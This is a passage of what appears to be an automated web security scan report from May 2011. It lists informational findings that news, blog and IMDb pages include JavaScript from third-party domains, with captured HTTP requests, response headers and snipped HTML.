Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:29:51 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 2233

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <m
...[SNIP]...
<http://www.omniture.com/> -->

<script language="JavaScript" type="text/javascript" src="http://www2.warnerbros.com/all/us/omniture/s_code_wbrostheatricaldomesticdvd.js "></script>
...[SNIP]...
14.33. http://www.gizmodo.com.au/2011/05/google-chrome-os-lands-on-hardware-you-can-actually-buy/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gizmodo.com.au
Path:   /2011/05/google-chrome-os-lands-on-hardware-you-can-actually-buy/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /2011/05/google-chrome-os-lands-on-hardware-you-can-actually-buy/ HTTP/1.1
Host: www.gizmodo.com.au
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:28:18 GMT
Server: Apache
Last-Modified: Thu, 12 May 2011 13:19:32 GMT
ETag: "6aa380-84a4-4a3140a296100;4a2fc60d6f0c0"
Accept-Ranges: bytes
Cache-Control: max-age=3, must-revalidate
Expires: Thu, 12 May 2011 13:28:21 GMT
Vary: Accept-Encoding,Cookie
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 33956

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head>

...[SNIP]...
</script><script type="text/javascript" id="topsy-js-elem" src="http://cdn.topsy.com/topsy.js?init=topsyWidgetCreator"></script>
...[SNIP]...
<![endif]-->
   <script type='text/javascript' src='http://partner.googleadservices.com/gampad/google_service.js'>
   </script>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://tags.gawker.com/assets/minify.php?base=/assets/base.v9/js/&type=js&dir=jquery,jquery/plugin,framework,misc&rev=20101028"></script>
   <script type="text/javascript" src="http://cache.alluremedia.com.au/g/base.v1/js/common.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
<![if ! IE 6]>
       <script type="text/javascript" src="http://cache.alluremedia.com.au/g/base.v1/js/sticky.js"></script>
   <![endif]>
   <script type="text/javascript" src="//secure-au.imrworldwide.com/v60.js">
   </script>
...[SNIP]...
14.34. http://www.greenfieldreporter.com/view/story/0a19804652d4473789a5eda53a1ed37f/US-Investing-Unlucky-Seven/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.greenfieldreporter.com
Path:   /view/story/0a19804652d4473789a5eda53a1ed37f/US-Investing-Unlucky-Seven/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /view/story/0a19804652d4473789a5eda53a1ed37f/US-Investing-Unlucky-Seven/ HTTP/1.1
Host: www.greenfieldreporter.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:31:17 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5
X-Powered-By: PHP/5.2.17
Cache-Control: no-cache, must-revalidate
Expires: Sat, 26 Jul 1997 05:00:00 GMT
Set-Cookie: FreakAuth=eada766c7f8a5c964fd833650e2df4eb; expires=Thu, 12-May-2011 15:31:41 GMT; path=/
Content-Type: text/html
Content-Length: 40407

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>7 'unlucky' mon
...[SNIP]...
<!-- PUT THIS TAG IN THE head SECTION -->
<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...
</script><script type="text/javascript" src="http://static.addtoany.com/menu/page.js"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#pubid=xa-4d7141df0f439530"></script>
...[SNIP]...
14.35. http://www.imdb.com/images/a/ifb/google_afc_labs.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.imdb.com
Path:   /images/a/ifb/google_afc_labs.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /images/a/ifb/google_afc_labs.html HTTP/1.1
Host: www.imdb.com
Proxy-Connection: keep-alive
Referer: http://www.imdb.com/title/tt0758746/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uu=BCYuu2zqPERsXjOIlBAp-cjrDMFYneHdmDUJJCRyLvlP7SBQKVOp_bqcrU17fdV4c1Nux7b6wi8TVWy3PgqI2N2vyi8DbaZtgQOc3SUCTqAb5v4YvPdOMHMr5efUyZ768a2UyWyCMcSiiYDZG7K34mfezDLyRnHJUHzqf-X2mmA5pP6_wQwNseT9v_l2WPrcPJphV9dQUN2P8YYSH2KBc4LAfQzVCx9qa2YDiURaB1D-Gl-D-0OX8SBshF3L7oZM2bsj_SAAc0ORAvs9-s87-CXXBw; cs=0MzY3hwOZPKVaNMBzsAUTgiOAiSO2RITtsmaRI3aUVQNijEn/noBF47ZEhQoWVIEjtkkY9r94iSJT7YyLfxUUimZspce2SSyblESJI7vJDOO2RIkjvkSJI7ZEmTOiWIUg=; session-id=659-5207047-8209100; session-id-time=1462887047

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:32:28 GMT
Server: Server
Last-Modified: Wed, 11 May 2011 05:35:48 GMT
ETag: "999-4a2f971e17500"
Accept-Ranges: bytes
Cache-Control: max-age=315360000
Expires: Sun, 09 May 2021 13:32:28 GMT
Cneonction: close
Content-Type: text/html
Vary: Accept-Encoding
P3P: policyref="http://i.imdb.com/images/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC "
Content-Length: 2457

<html>
<head>

<script type="text/javascript">
var loc = document.location.toString();
var args_idx = loc.indexOf("#");
if (args_idx != -1) {
var args_str = loc.substring(args_idx + 1);

var a
...[SNIP]...
</script>

<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
14.36. http://www.imdb.com/images/a/ifb/pda_comm2.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.imdb.com
Path:   /images/a/ifb/pda_comm2.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /images/a/ifb/pda_comm2.html HTTP/1.1
Host: www.imdb.com
Proxy-Connection: keep-alive
Referer: http://cdn-bpx.a9.com/amzn/iframe.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uu=BCYuu2zqPERsXjOIlBAp-cjrDMFYneHdmDUJJCRyLvlP7SBQKVOp_bqcrU17fdV4c1Nux7b6wi8TVWy3PgqI2N2vyi8DbaZtgQOc3SUCTqAb5v4YvPdOMHMr5efUyZ768a2UyWyCMcSiiYDZG7K34mfezDLyRnHJUHzqf-X2mmA5pP6_wQwNseT9v_l2WPrcPJphV9dQUN2P8YYSH2KBc4LAfQzVCx9qa2YDiURaB1D-Gl-D-0OX8SBshF3L7oZM2bsj_SAAc0ORAvs9-s87-CXXBw; cs=0MzY3hwOZPKVaNMBzsAUTgiOAiSO2RITtsmaRI3aUVQNijEn/noBF47ZEhQoWVIEjtkkY9r94iSJT7YyLfxUUimZspce2SSyblESJI7vJDOO2RIkjvkSJI7ZEmTOiWIUg=; session-id=659-5207047-8209100; session-id-time=1462887047; us=s%3D939%3Bs%3D534%3Bs%3D944%3Bs%3D67%3Bs%3D24%3Bs%3D143%3Bs%3D1009%3Bs%3D32%3Bs%3D16%3Bs%3Dc1%3Bs%3Dc4%3Bs%3Dc4%3Bs%3Dc3%3Bs%3Dc1%3Bs%3Dc2%3B; __utmz=168836921.1305207064.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=168836921.1717137058.1305207064.1305207064.1305207064.1; __utmb=168836921.0.10.1305207064; __utmc=168836921; __utmv=168836921.Falkor

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:33:17 GMT
Server: Server
Last-Modified: Wed, 11 May 2011 21:11:58 GMT
ETag: "69-4a30685dfa380"
Accept-Ranges: bytes
Cache-Control: max-age=315360000
Expires: Sun, 09 May 2021 13:33:17 GMT
Cneonction: close
Content-Type: text/html
Vary: Accept-Encoding
P3P: policyref="http://i.imdb.com/images/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC "
Content-Length: 105

<html><body><script src="http://g-ecx.images-amazon.com/images/G/01/pda/pda.js"></script></body></html>
14.37. http://www.imdb.com/title/tt0758746/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.imdb.com
Path:   /title/tt0758746/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /title/tt0758746/ HTTP/1.1
Host: www.imdb.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:32:10 GMT
Server: Server
Cache-Control: private
Cneonction: close
Content-Type: text/html
Set-Cookie: uu=BCYoEYVRn4Z080oVMyaiqkqVil4NObOLHdXg6V5nGFmrKaSp0r5qR1B2q9QdB7DhaW1bB8f4YSIcdmATWdaiYxq_IKR6HKOfkXgDQfVNYlQiBpSUrIq7tamZGfahcbUG9demse85k_CYY6GSxnL7TXGOTdF22fYw9tuZoqsJ96-9rbgaeJ1YzXUvXfDBmlNbH7O2NATYg9Gj1v-3XgpM4a7BxgwwkkhBCdF9BCMNauUPDHvyMm6Wd_QvKZjUSKBxpz_0SyBElOdhtkg2XpExQVhTtg;expires=Thu, 30 Dec 2037 00:00:00 GMT;path=/;domain=.imdb.com
Set-Cookie: cs=x1X0LC0cCNNUopm1JgkB7wCmW+248W26o5HlqiOSHqmTom7pgKHNGbCxbbqm1js64JFtupZmeM2jsk9fJ9HNKeCRWyxAGW26oKdbraCRbbqgsW26oJFt+uDBHYqg==;expires=Fri, 13 May 2011 07:00:00 GMT;path=/;domain=.imdb.com
Set-Cookie: cs=5DCTg6yZP2fcEVMbF0nxoAiOAiSO2RITtsmaRI3KISQNijEn/noBF47ZEhQoWVIEjtkkY9gaIiSL/CSSbf6WwAmZspee2SSyblESJI7vJDOO2RIkjvkSJI7ZEmTOiWIUg=;expires=Fri, 13 May 2011 07:00:00 GMT;path=/;domain=.imdb.com
Set-Cookie: cs=Qy5PblGX7FQYyXU8oLHhYQiOAiSO2RITtsmaRI3KISQNijEn/noBF47ZEhQoWVIEjtkkY9l9kiSN/yWjjd13MsmZspeu2SSyblESJI7vJDOO2RIkjvkSJI7ZEmTOiWIUg=;expires=Fri, 13 May 2011 07:00:00 GMT;path=/;domain=.imdb.com
Set-Cookie: cs=lCczZSsnIliq67dpM+chZACmW+248W26o5HlqiOSHqmTom7pgKHNGbCxbbqm1js64JFtupbHGr/ThyscN9HNKfCRWyxAGW26oKdbraCRbbqgsW26oJFt+uDBHYqg==;expires=Fri, 13 May 2011 07:00:00 GMT;path=/;domain=.imdb.com
Set-Cookie: cs=QkXpKjI6/xJZJiwqwOYA/gbGfbqgkW2NmIHl2qOCXrojwk650DJ+iaCRbYoGES2aoJFb/fcWXbqj05s5t9HNyfCRWyxAGW26oKdbraCRbbqgsW26oJFt+uDBHYqg==;expires=Fri, 13 May 2011 07:00:00 GMT;path=/;domain=.imdb.com
Set-Cookie: cs=7FXQMV6N2neppbMXfWZiOwenOqqgkW26kBl9MsPifomjkj6ZoDHOqZCRbbqXx+36gJFtjOSnGIqjpggpN9HNOeCRWyxAGW26oKdbraCRbbqgsW26oJFt+uDBHYqg==;expires=Fri, 13 May 2011 07:00:00 GMT;path=/;domain=.imdb.com
Set-Cookie: session-id=864-5207130-5211698;path=/;domain=.imdb.com;expires=Tue, 10 May 2016 06:32:10 GMT
Set-Cookie: session-id-time=1462887130;path=/;domain=.imdb.com;expires=Tue, 10 May 2016 06:32:10 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="http://i.imdb.com/images/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC "
Content-Length: 93623


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/sch
...[SNIP]...
<!-- start m/s/a/_g_a_s , head -->
<script src="http://i.media-imdb.com/images/SFb7e96d4b6dc1fbb52d07ca25cb5a6a02/js/cc/ads.js" ></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://z-ecx.images-amazon.com/images/G/01/x-locale/personalization/uts/js/prod-v11.js">
</script>
...[SNIP]...
</div>
<script src="http://i.media-imdb.com/images/SF10092eee563dec2dca82b77d2cf5a1ae/js/jquery.js" ></script><script src="http://i.media-imdb.com/images/SFbab4b9c36c6a2f5e5394cbb81ae2b98c/js/jquery/ui-current-custom.js" ></script><script src="http://i.media-imdb.com/images/SF72e1d93fddec7a7150ae9de2b334a1cd/js/jquery/plugins/jquery.appear-1.1.1.min.js" ></script><script src="http://i.media-imdb.com/images/SFd4584e7d464fe4c751538fe37e9489ec/js/jquery/plugins/jquery.appear.imdb.js" ></script><script src="http://i.media-imdb.com/images/SF073d3ef3ffb46e3586a37436e7ffb2f0/js/app/falkor/ajax.js" ></script><script src="http://i.media-imdb.com/images/SF3bc94709a0ca67a4280d674b80cf653a/js/app/falkor/quicklinks.js" ></script>
...[SNIP]...
</div>
<script src="http://i.media-imdb.com/images/SF1b83364c8a1d6f71c79acfee1edd87be/js/clicktale-WRb6.js" type="text/javascript"></script>
<script type="text/javascript" src="http://i.media-imdb.com/images/SF8ce2dec22e880d42dd87258c611fc340/js/clicktale-FetchFromWithCookies.js"></script>
...[SNIP]...
</script>
<script src="http://i.media-imdb.com/images/SF4f789f206c87a31b26eb8666da48322e/js/app/win7/sitemode.js" ></script>
...[SNIP]...
</span>
<script src="http://i.media-imdb.com/images/SF86793c35a08946b1496c39d0dbd5b6c9/js/jquery/plugins/jquery.colorbox-min.js" ></script><script src="http://i.media-imdb.com/images/SF1eee5a558bf394690b6350cfff70ab65/js/cc/loginbox.js" ></script><script src="http://i.media-imdb.com/images/SF6aa1c2e4496f4a4ad5122e6ca372f2b2/js/navbar.js" ></script><script src="http://i.media-imdb.com/images/SF1bc55d526cb484e2b1ad3ef681e954cf/js/cc/suggestionsearch.js" charset="UTF-8"></script><script src="http://i.media-imdb.com/images/SFe04edf8d019d53fe7b769caa32b55d71/js/cc/rating.js" ></script>
...[SNIP]...
</script><script src="http://i.media-imdb.com/images/SFcc0a522af34c307df9cbd83dfaa9ecab/js/cc/watchlist.js" ></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.google-analytics.com/ga.js"></script>
...[SNIP]...
</script>
<script src="http://i.media-imdb.com/images/SF14176f459bd0474f6a0284a9c3ba61f7/a/js/beacon.js" ></script>
...[SNIP]...
14.38. http://www.imdb.com/title/tt0758746/_ajax/footer  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.imdb.com
Path:   /title/tt0758746/_ajax/footer

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /title/tt0758746/_ajax/footer HTTP/1.1
Host: www.imdb.com
Proxy-Connection: keep-alive
Referer: http://www.imdb.com/title/tt0758746/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: text/html, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uu=BCYuu2zqPERsXjOIlBAp-cjrDMFYneHdmDUJJCRyLvlP7SBQKVOp_bqcrU17fdV4c1Nux7b6wi8TVWy3PgqI2N2vyi8DbaZtgQOc3SUCTqAb5v4YvPdOMHMr5efUyZ768a2UyWyCMcSiiYDZG7K34mfezDLyRnHJUHzqf-X2mmA5pP6_wQwNseT9v_l2WPrcPJphV9dQUN2P8YYSH2KBc4LAfQzVCx9qa2YDiURaB1D-Gl-D-0OX8SBshF3L7oZM2bsj_SAAc0ORAvs9-s87-CXXBw; cs=0MzY3hwOZPKVaNMBzsAUTgiOAiSO2RITtsmaRI3aUVQNijEn/noBF47ZEhQoWVIEjtkkY9r94iSJT7YyLfxUUimZspce2SSyblESJI7vJDOO2RIkjvkSJI7ZEmTOiWIUg=; session-id=659-5207047-8209100; session-id-time=1462887047; us=s%3D939%3Bs%3D534%3Bs%3D944%3Bs%3D67%3Bs%3D24%3Bs%3D143%3Bs%3D1009%3Bs%3D32%3Bs%3D16%3Bs%3Dc1%3Bs%3Dc4%3Bs%3Dc4%3Bs%3Dc3%3Bs%3Dc1%3Bs%3Dc2%3B; __utmz=168836921.1305207064.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=168836921.1717137058.1305207064.1305207064.1305207064.1; __utmb=168836921.0.10.1305207064; __utmc=168836921; __utmv=168836921.Falkor

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:32:55 GMT
Server: Server
Cache-Control: private
nnCoection: close
Content-Type: text/html
Vary: Accept-Encoding,User-Agent
P3P: policyref="http://i.imdb.com/images/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC "
Content-Length: 28375


<div class="article" >


<h2>Frequently Asked Questions</h2>

<div class="faq">
<div class="odd">
<b>Q:</b>
<a onclick="(new Image()).src='/rg/title-tease/faq-question/images/b.gif?link=
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://i.media-imdb.com/images/SF558ae863f476a6a474e9c249aef04109/css2/app/feedback/page_feedback.css" ><script src="http://i.media-imdb.com/images/SFd4584e7d464fe4c751538fe37e9489ec/js/jquery/plugins/jquery.appear.imdb.js" ></script><script src="http://i.media-imdb.com/images/SF207ebab053149f37d10ce21d602b87f5/js/app/feedback/page_feedback.js" ></script>
14.39. http://www.milehighonthecheap.com/2011/05/no-foolin-free-cat-friday-adoption-special-in-boulder/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.milehighonthecheap.com
Path:   /2011/05/no-foolin-free-cat-friday-adoption-special-in-boulder/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /2011/05/no-foolin-free-cat-friday-adoption-special-in-boulder/ HTTP/1.1
Host: www.milehighonthecheap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:31:57 GMT
Server: Apache
Last-Modified: Thu, 12 May 2011 08:33:16 GMT
Accept-Ranges: bytes
Cache-Control: max-age=300, must-revalidate
Expires: Thu, 12 May 2011 13:36:57 GMT
Vary: Accept-Encoding,Cookie
Content-Type: text/html; charset=UTF-8
Content-Length: 68093

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head>
<
...[SNIP]...
</script><script type="text/javascript" src="http://static.addtoany.com/menu/page.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</form>

<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&amp;lang=en"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
<!-- Advertising Manager v3.4.19 (1.197 seconds.) -->

   <script src="http://stats.wordpress.com/e-201119.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
14.40. http://www.milehighonthecheap.com/wp-content/themes/atahualpa353/images/favicon/cities.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.milehighonthecheap.com
Path:   /wp-content/themes/atahualpa353/images/favicon/cities.ico

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /wp-content/themes/atahualpa353/images/favicon/cities.ico HTTP/1.1
Host: www.milehighonthecheap.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anti-captcha-crc=1a4fa4a4438895652eab32279365c62b77fc9add; __utmz=143899945.1305207063.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-2032681215-1305207070993; __utma=143899945.1163999256.1305207063.1305207063.1305207063.1; __utmc=143899945; __utmb=143899945.2.10.1305207063

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 13:34:11 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Vary: Accept-Encoding,Cookie
X-Pingback: http://www.milehighonthecheap.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1305207252+173.193.214.243; path=/
Last-Modified: Thu, 12 May 2011 13:34:12 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 60966

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head>
<
...[SNIP]...
</form>

<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&amp;lang=en"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
<!-- Advertising Manager v3.4.19 (0.347 seconds.) -->

   <script src="http://stats.wordpress.com/e-201119.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
14.41. http://www.mysuburbanlife.com/lyons/lifestyle/entertainment/x1539859994/To-do-tonight-Watch-American-Idol-Priest-opens-Friday-the-13th  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mysuburbanlife.com
Path:   /lyons/lifestyle/entertainment/x1539859994/To-do-tonight-Watch-American-Idol-Priest-opens-Friday-the-13th

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /lyons/lifestyle/entertainment/x1539859994/To-do-tonight-Watch-American-Idol-Priest-opens-Friday-the-13th HTTP/1.1
Host: www.mysuburbanlife.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:31:45 GMT
Server: zope.server.http (WSGI-HTTP)
X-Powered-By: Zope (www.zope.org), Python (www.python.org)
Content-Type: text/html;charset=utf-8
Cache-Control: max-age=1200
Age: 309
X-Cache: HIT from parent1.ghm.zope.net
X-Cache: MISS from cache2.ghm.zope.net
Via: 1.0 parent1.ghm.zope.net:80 (squid/2.7.STABLE9), 1.0 cache2.ghm.zope.net:80 (squid)
Vary: Accept-Encoding
Connection: close
Content-Length: 46266


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/
...[SNIP]...
<meta property="fb:app_id" content="160572303960464" />

   
       <script type="text/javascript" src="http://www.google.com/jsapi"></script>
...[SNIP]...
</script>
       <script type="text/javascript"
src="http://global.static.ghm.zope.net/resources/deep_dish/scripts/feed_handler.js"></script>
       <script type="text/javascript"
src="http://global.static.ghm.zope.net/resources/deep_dish/scripts/nav.js"></script>
       <script type="text/javascript"
src="http://global.static.ghm.zope.net/resources/deep_dish/scripts/global.js"></script>
...[SNIP]...
</script>
       
       
                <script type="text/javascript"
src="http://dv2.gatehousemedia.com/matt/reg/comments.js"></script>
...[SNIP]...
</script>
   
       
       <script type="text/javascript" src="http://e.yieldmanager.net/script.js"></script>
...[SNIP]...
<div class="m10b">
   <script type="text/javascript"
src="http://mysuburbanlife.mycapture.com/mycapture/scripts/remote.asp"></script>
...[SNIP]...
</table>


<script type="text/javascript" src="http://w.sharethis.com/button/buttons.js"></script>
...[SNIP]...
<div class="center m10v">
            <script language="JavaScript" src="http://cm.npc-gatehouse.overture.com/partner/js/ypn.js"></script>
...[SNIP]...
</script>
    <script type="text/javascript" src="http://global.static.ghm.zope.net/resources/global/ghs_wa.js"></script>
...[SNIP]...
</script>
               <script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
14.42. http://www.pcworld.com/article/227430/chrome_os_will_likely_include_netflix_support.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pcworld.com
Path:   /article/227430/chrome_os_will_likely_include_netflix_support.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /article/227430/chrome_os_will_likely_include_netflix_support.html HTTP/1.1
Host: www.pcworld.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
